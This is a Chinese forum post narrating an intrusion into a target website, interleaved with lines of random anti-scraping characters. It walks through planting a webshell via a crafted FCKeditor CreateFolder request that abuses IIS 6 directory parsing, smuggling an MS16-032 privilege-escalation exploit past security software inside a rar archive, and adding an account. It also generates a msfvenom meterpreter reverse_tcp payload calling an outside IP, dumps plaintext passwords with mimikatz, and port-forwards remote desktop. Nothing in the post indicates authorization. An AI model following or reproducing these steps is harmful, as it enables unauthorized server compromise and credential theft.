|
' ?1 ^: _1 z8 @# F) o/ n4 ^
" w$ J3 F m* U f
& Y" b8 x$ k1 c! S% u8 L5 p% O
. d/ c, ^$ U: g | ) s; a5 Q3 U. g3 A" h- E- I
" `5 V, l' V/ X! `& U9 p) w! o: e
5 y& M; f/ l8 H- I6 W" t
一、 利用getwebshell篇
; d& T- A3 s; g: z0 S
" x3 Q# Y/ S: |0 Z6 h( \6 |! o
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
8 ]4 L4 D: _5 I# K% v
4 |9 z1 J: z( f
' e+ X1 ^: r& k3 w; }
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
3 a5 B& F) U6 @- a# H2 W
% g$ Y( w1 d7 n8 _" B
下面我们构造一个asp目录,如:
* {7 \8 h( [0 h4 L) u0 _8 H2 D
% r, e+ H* G$ W) {6 K
6 H% A# f [ @- P http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975 $ Z1 @- v4 i* Q& Z# U/ j+ F
+ J m' J* D" _" ^6 R9 A" R- } ) V( U3 P7 D- R3 F% I
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
, B- E' C+ G/ {7 b- d
8 z% d+ E6 ?8 u4 y l. e) @$ n* z
一、 绕过安全狗云锁提权并且加账号
( m1 z4 k1 D* i" a
3 |' X% g% o. v c' p: T D
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
8 @1 l8 x+ X. C
/ Y$ m$ o, P1 V- z) b \; n# r如图:
$ j: y- |4 b' \9 j% @- i2 R B
* b, f+ L, H* W
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
2 E4 K* R0 |2 Z1 v& `# n2 U& S
$ P0 z7 E- B1 e8 ~ c7 }
一、 利用metasploit
# I# D( H4 Q7 e2 V; m
, ^9 a: b, f7 f首先用pentestbox生成一个64位的payload如下命令
2 N: p; X' t# w, u; Y: U5 _; A
" V3 M; c, i& `" fmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
" c% y( V' K9 r- p" T' [6 f7 X/ F
$ ^# h$ k/ |* i6 E* z
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
8 j" c( P T% B) [6 E @8 Y2 p
. Y7 ?) x% Y8 q
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
. m+ @6 i* e* V4 C1 I& o2 \1 s
# |! l' j1 ~# ?; V
下面我们来做一个监听如下命令:
# c* z& h5 d* Q& o0 L
' C8 A4 k2 T5 T' [
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
7 u# L K# x* B0 g6 v - n9 R* X, q- g3 V" {0 B
* |2 V+ d: H8 a
|
3 O0 M0 n( C a6 Q $ ?1 ?$ F1 o* I- Z
5 s( r3 N' C6 w' m+ }9 O( V* B5 I
* Q* S+ X4 _, v- q6 y7 C
i9 t' [! P4 h" {. i4 \7 p. ~
5 w; Q" Q2 h6 ]
- c! L" \+ [$ w8 ?
% J1 [1 @! M0 p: g2 }4 E
' c( j# ]8 {4 B0 Z- E - w6 C& R. z8 C) Z8 B, {0 s
; X3 F9 W( F# ]6 }+ h
: v% U6 n5 t' e/ P( E
# @7 F6 b! x# ?5 q! z
& j8 N9 h5 j8 X5 C' A
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06